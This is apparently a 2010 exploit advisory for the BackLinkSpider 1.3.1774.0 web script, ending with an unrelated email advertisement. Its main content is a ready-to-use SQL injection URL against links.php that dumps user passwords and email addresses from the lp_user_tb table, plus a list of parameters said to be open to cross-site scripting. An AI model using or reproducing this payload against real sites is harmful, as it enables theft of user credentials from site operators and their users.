BackLinkSpider version 1.3.1774.0 suffers from cross site scripting and remote SQL injection vulnerabilities.
de0472686ec59875781071d4abbba198b8300512ce9f3eb27eb4e6ac59a41fea
# Exploit Title: [ BackLinkSpider - (links.php) - [ SQL & XSS ] Injection Vulnerability ]
# Date: [ 2010-05-27 ]
# Author: [ sniper ip ]
# Software Link: [ http://www.backlinkspider.com ]
# Version: [ v 1.3.1774.0 ]
# Tested on: [ ]
# CVE : [if exists]
Exploit :
[ SQL ]
http://site.com/links.php?cat_id=-1+UNION+SELECT+1,2,3,4,5,6,concat(password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20+from+lp_user_tb--
----------------------------------------------
[ XSS ]
http://site.com/links.php?cat_id=
http://site.com/links.php?siteid=
http://site.com/links.php?cat_id=1&cat_name=1
_________________________________________________________________
Your E-mail and More On-the-Go. Get Windows Live Hotmail Free.
https://signup.live.com/signup.aspx?id=60969